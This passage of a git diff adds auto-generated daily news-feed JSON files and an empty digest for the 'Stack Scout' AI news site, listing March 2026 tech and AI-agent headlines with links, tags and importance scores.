faster than std:sort and pdqsort with C and C++ API](https://tiki.li/blog/blqsort) +*Hacker News* | 02/06/2026 | Score: 0.48 +Tags: api_update + +--- + diff --git a/data/digest-2026-06-06.md b/data/digest-2026-06-06.md new file mode 100644 index 0000000..ac59722 --- /dev/null +++ b/data/digest-2026-06-06.md @@ -0,0 +1,5 @@ +# Stack Scout - AI News Digest +**2026-06-06** | 0 stories | Auto-generated from 138 recent stories + +--- + diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index f57652d..0f23911 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "thesis": "Stack Scout is a public guide, not a benchmark lab. We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/news-feed-2026-03-15.json b/data/news-feed-2026-03-15.json new file mode 100644 index 0000000..86e7524 --- /dev/null +++ b/data/news-feed-2026-03-15.json @@ -0,0 +1,55 @@ +{ + "generated": "2026-06-05T00:44:28.529Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-15", + "article_count": 3, + "archived_story_count": 55, + "articles": [ + { + "title": "Show HN: Open-source playground to red-team AI agents with exploits published", + "url": "https://github.com/fabraix/playground", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8799999999999999, + "date": "2026-03-15T22:29:46.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Chrome DevTools MCP (2025)", + "url": "https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session", + "source": "Hacker News", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 0.81, + "date": "2026-03-15T19:12:53.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Office.eu launches as Europe's sovereign office platform", + "url": "https://office.eu/media/pressrelease-20260304", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.7599999999999999, + "date": "2026-03-15T18:22:36.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-16.json b/data/news-feed-2026-03-16.json new file mode 100644 index 0000000..f7b30f3 --- /dev/null +++ b/data/news-feed-2026-03-16.json @@ -0,0 +1,134 @@ +{ + "generated": "2026-06-05T00:44:28.694Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-16", + "article_count": 8, + "archived_story_count": 67, + "articles": [ + { + "title": "Apideck CLI – An AI-agent interface with much lower context consumption than MCP", + "url": "https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative", + "source": "Hacker News", + "tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-03-16T15:25:36.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Speed at the cost of quality: Study of use of Cursor AI in open source projects", + "url": "https://arxiv.org/abs/2511.04427", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.87, + "date": "2026-03-16T17:07:37.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nvidia Launches Vera CPU, Purpose-Built for Agentic AI", + "url": "https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.84, + "date": "2026-03-16T20:01:02.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nango (YC W23, API Access for Agents and Apps) Is Hiring", + "url": "https://jobs.ashbyhq.com/Nango", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.82, + "date": "2026-03-16T12:03:13.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "SpiceCrypt: A Python library for decrypting LTspice encrypted model files", + "url": "https://github.com/jtsylve/spice-crypt", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7599999999999999, + "date": "2026-03-15T07:11:32.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Event Publisher enables event integration between Keycloak and OpenFGA", + "url": "https://github.com/embesozzi/keycloak-openfga-event-publisher", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7, + "date": "2026-03-16T14:21:07.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Lazycut: A simple terminal video trimmer using FFmpeg", + "url": "https://github.com/emin-ozata/lazycut", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-16T12:05:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Leanstral: Open-source agent for trustworthy coding and formal proof engineering", + "url": "https://mistral.ai/news/leanstral", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-16T20:59:40.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-17.json b/data/news-feed-2026-03-17.json new file mode 100644 index 0000000..56073d6 --- /dev/null +++ b/data/news-feed-2026-03-17.json @@ -0,0 +1,237 @@ +{ + "generated": "2026-06-05T00:44:28.931Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-17", + "article_count": 15, + "archived_story_count": 140, + "articles": [ + { + "title": "Show HN: Crust – A CLI framework for TypeScript and Bun", + "url": "https://github.com/chenxin-yan/crust", + "source": "Hacker News", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-03-17T04:43:29.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "World launches tool to verify humans behind AI shopping agents", + "url": "https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-17T15:00:00.000Z", + "summary": "As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce.", + "category": "ai_tools" + }, + { + "title": "Picsart now allows creators to ‘hire’ AI assistants through agent marketplace", + "url": "https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/", + "source": "TechCrunch AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-03-17T04:01:00.000Z", + "summary": "Picsart's AI agent marketplace will launch with four agents, then add more agents each week.", + "category": "ai_tools" + }, + { + "title": "Nvidia’s version of OpenClaw could solve its biggest problem: security", + "url": "https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/", + "source": "TechCrunch AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-03-16T22:45:51.000Z", + "summary": "Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw.", + "category": "ai_tools" + }, + { + "title": "How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect", + "url": "https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-16T17:51:46.000Z", + "summary": "GTC is Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI.", + "category": "ai_tools" + }, + { + "title": "China’s OpenClaw Boom Is a Gold Rush for AI Companies", + "url": "https://www.wired.com/story/china-is-going-all-in-on-openclaw/", + "source": "Wired AI", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.9099999999999999, + "date": "2026-03-13T12:00:00.000Z", + "summary": "Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies.", + "category": "ai_tools" + }, + { + "title": "Mistral AI Releases Forge", + "url": "https://mistral.ai/news/forge", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.79, + "date": "2026-03-17T21:04:26.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust", + "url": "https://github.com/peters/horizon", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.78, + "date": "2026-03-17T18:14:24.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Chrome extension adjusts video speed based on how fast the speaker is talking", + "url": "https://github.com/ywong137/speech-speed", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.78, + "date": "2026-03-13T06:18:17.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name", + "url": "https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/", + "source": "Ars Technica AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.78, + "date": "2026-02-13T19:40:21.000Z", + "summary": "This story has been retracted", + "category": "tech_general" + }, + { + "title": "Node.js needs a virtual file system", + "url": "https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-17T14:28:37.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Kagi Translate now supports LinkedIn Speak as an output language", + "url": "https://translate.kagi.com/?from=en&to=LinkedIn+speak", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7, + "date": "2026-03-17T04:39:42.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Reverse-engineering Viktor and making it Open Source", + "url": "https://matijacniacki.com/blog/openviktor", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-17T08:15:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Building a Shell", + "url": "https://healeycodes.com/building-a-shell", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-17T09:52:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Droeftoeter, a Terminal Coding Toy", + "url": "https://github.com/whtspc/droeftoeter", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-13T04:16:26.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-18.json b/data/news-feed-2026-03-18.json new file mode 100644 index 0000000..bceb1ea --- /dev/null +++ b/data/news-feed-2026-03-18.json @@ -0,0 +1,160 @@ +{ + "generated": "2026-06-05T00:44:29.089Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-18", + "article_count": 10, + "archived_story_count": 90, + "articles": [ + { + "title": "The leaderboard “you can’t game,” funded by the companies it ranks", + "url": "https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-18T16:30:00.000Z", + "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […]", + "category": "ai_tools" + }, + { + "title": "The PhD students who became the judges of the AI industry", + "url": "https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-18T15:00:00.000Z", + "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […]", + "category": "ai_tools" + }, + { + "title": "Meta is having trouble with rogue AI agents", + "url": "https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/", + "source": "TechCrunch AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.99, + "date": "2026-03-18T23:42:46.000Z", + "summary": "A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it.", + "category": "ai_tools" + }, + { + "title": "Launch an autonomous AI agent with sandboxed execution in 2 lines of code", + "url": "https://amaiya.github.io/onprem/examples_agent.html", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.98, + "date": "2026-03-18T01:10:19.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nightingale – open-source karaoke app that works with any song on your computer", + "url": "https://nightingale.cafe/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7599999999999999, + "date": "2026-03-18T08:06:24.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "A ngrok-style secure tunnel server written in Rust and Open Source", + "url": "https://github.com/joaoh82/rustunnel", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.71, + "date": "2026-03-18T14:00:43.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Tmux-IDE, OSS agent-first terminal IDE", + "url": "https://tmux.thijsverreck.com", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-18T17:46:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Pgit – A Git-like CLI backed by PostgreSQL", + "url": "https://oseifert.ch/blog/building-pgit", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-17T06:11:17.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m", + "url": "https://huggingface.co/datasets/open-index/hacker-news", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7, + "date": "2026-03-14T17:12:03.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Measuring progress toward AGI: A cognitive framework", + "url": "https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.61, + "date": "2026-03-18T11:44:44.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-19.json b/data/news-feed-2026-03-19.json new file mode 100644 index 0000000..d4b456d --- /dev/null +++ b/data/news-feed-2026-03-19.json @@ -0,0 +1,87 @@ +{ + "generated": "2026-06-05T00:44:29.270Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-19", + "article_count": 5, + "archived_story_count": 98, + "articles": [ + { + "title": "Multiverse Computing pushes its compressed AI models into the mainstream", + "url": "https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/", + "source": "TechCrunch AI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-03-19T08:00:00.000Z", + "summary": "After compressing models from major AI labs, including OpenAI, Meta, DeepSeek, and Mistral AI, Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available.", + "category": "ai_tools" + }, + { + "title": "DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI", + "url": "https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9099999999999999, + "date": "2026-03-19T16:14:00.000Z", + "summary": "Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language.", + "category": "ai_tools" + }, + { + "title": "Hyper-optimized reverse geocoding API", + "url": "https://github.com/traccar/traccar-geocoder", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.7599999999999999, + "date": "2026-03-19T14:38:51.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Framework doesn't matter", + "url": "https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7599999999999999, + "date": "2026-03-14T22:14:26.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Cook: A simple CLI for orchestrating Claude Code", + "url": "https://rjcorwin.github.io/cook/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.6499999999999999, + "date": "2026-03-19T02:20:34.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-20.json b/data/news-feed-2026-03-20.json new file mode 100644 index 0000000..c4f0a1c --- /dev/null +++ b/data/news-feed-2026-03-20.json @@ -0,0 +1,102 @@ +{ + "generated": "2026-06-05T00:44:29.431Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-20", + "article_count": 6, + "archived_story_count": 82, + "articles": [ + { + "title": "OpenCode – Open source AI coding agent", + "url": "https://opencode.ai/", + "source": "Hacker News", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 0.76, + "date": "2026-03-20T21:03:52.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned", + "url": "https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/", + "source": "Wired AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-03-20T10:00:00.000Z", + "summary": "When social media is constantly pushing people to use AI, why not let AI agents participate?", + "category": "ai_tools" + }, + { + "title": "Trump’s AI framework targets state laws, shifts child safety burden to parents", + "url": "https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/", + "source": "TechCrunch AI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.9099999999999999, + "date": "2026-03-20T16:14:04.000Z", + "summary": "Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies.", + "category": "ai_tools" + }, + { + "title": "Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran", + "url": "https://github.com/FormerLab/fortransky", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-20T22:06:51.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost", + "url": "https://github.com/RasKrebs/sonar", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-20T09:59:56.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: An open-source safety net for home hemodialysis", + "url": "https://safehemo.com/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-17T00:48:15.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-21.json b/data/news-feed-2026-03-21.json new file mode 100644 index 0000000..c72119d --- /dev/null +++ b/data/news-feed-2026-03-21.json @@ -0,0 +1,115 @@ +{ + "generated": "2026-06-05T00:44:29.597Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-21", + "article_count": 7, + "archived_story_count": 80, + "articles": [ + { + "title": "Apple Announces New Mac Sales Record Following MacBook Neo Launch", + "url": "https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-03-21T15:59:42.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Mamba-3", + "url": "https://www.together.ai/blog/mamba-3", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.87, + "date": "2026-03-17T00:00:00.000Z", + "summary": "Meet Mamba-3: the SSM built for inference. Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one.", + "category": "tech_general" + }, + { + "title": "Iran launched unsuccessful attack on UK's Diego Garcia", + "url": "https://www.bbc.com/news/articles/c5yljdgwppzo", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.84, + "date": "2026-03-21T14:54:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Termcraft – terminal-first 2D sandbox survival in Rust", + "url": "https://github.com/pagel-s/termcraft", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-21T18:42:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Atuin v18.13 – better search, a PTY proxy, and AI for your shell", + "url": "https://blog.atuin.sh/atuin-v18-13/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-21T10:35:20.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "purl: a curl-esque CLI for making HTTP requests that require payment", + "url": "https://www.purl.dev/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-21T02:09:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Floci – A free, open-source local AWS emulator", + "url": "https://github.com/hectorvent/floci", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-21T21:49:15.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-22.json b/data/news-feed-2026-03-22.json new file mode 100644 index 0000000..0aac51b --- /dev/null +++ b/data/news-feed-2026-03-22.json @@ -0,0 +1,115 @@ +{ + "generated": "2026-06-05T00:44:29.763Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-22", + "article_count": 7, + "archived_story_count": 88, + "articles": [ + { + "title": "Elon Musk unveils chip manufacturing plans for SpaceX and Tesla", + "url": "https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-22T16:20:00.000Z", + "summary": "Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising.", + "category": "ai_tools" + }, + { + "title": "Show HN: A Markdown file that turns your AI agent into an autonomous researcher", + "url": "https://github.com/krzysztofdudek/ResearcherSkill", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.9199999999999999, + "date": "2026-03-22T18:21:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab", + "url": "https://www.royalbhati.com/hoptab", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7599999999999999, + "date": "2026-03-22T06:23:59.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Training Center for Maneuvering on Manned Model Ships", + "url": "https://www.portrevel.com/", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7599999999999999, + "date": "2026-03-20T12:04:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "$ teebot.dev – from terminal to tee in 6 seconds", + "url": "https://teebot.dev", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-22T12:22:50.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "How to Attract AI Bots to Your Open Source Project", + "url": "https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-21T20:58:01.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Node.js worker threads are problematic, but they work great for us", + "url": "https://www.inngest.com/blog/node-worker-threads", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-18T16:51:51.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-23.json b/data/news-feed-2026-03-23.json new file mode 100644 index 0000000..ad4a6fb --- /dev/null +++ b/data/news-feed-2026-03-23.json @@ -0,0 +1,55 @@ +{ + "generated": "2026-06-05T00:44:29.984Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-23", + "article_count": 3, + "archived_story_count": 82, + "articles": [ + { + "title": "The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy", + "url": "https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/", + "source": "MIT Tech Review AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.8800000000000001, + "date": "2026-03-23T12:17:33.000Z", + "summary": "This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in…", + "category": "ai_research" + }, + { + "title": "Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful", + "url": "https://github.com/oguzbilgic/agent-kernel", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.78, + "date": "2026-03-23T07:06:42.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y", + "url": "https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-20T13:21:51.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-24.json b/data/news-feed-2026-03-24.json new file mode 100644 index 0000000..4770e19 --- /dev/null +++ b/data/news-feed-2026-03-24.json @@ -0,0 +1,145 @@ +{ + "generated": "2026-06-05T00:44:30.177Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-24", + "article_count": 9, + "archived_story_count": 101, + "articles": [ + { + "title": "Google TV’s new Gemini features keep fans updated on sports teams and more", + "url": "https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/", + "source": "TechCrunch AI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-03-24T19:12:11.000Z", + "summary": "Three Gemini-powered features are coming to your Google TV. This includes visual responses, deep dives, and sports briefs.", + "category": "ai_tools" + }, + { + "title": "OpenAI adds open source tools to help developers build for teen safety", + "url": "https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/", + "source": "TechCrunch AI", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.94, + "date": "2026-03-24T18:41:34.000Z", + "summary": "Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build.", + "category": "ai_tools" + }, + { + "title": "Sunsetting the Techempower Framework Benchmarks", + "url": "https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.82, + "date": "2026-03-24T01:54:03.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Self-propagating malware poisons open source software and wipes Iran-based machines", + "url": 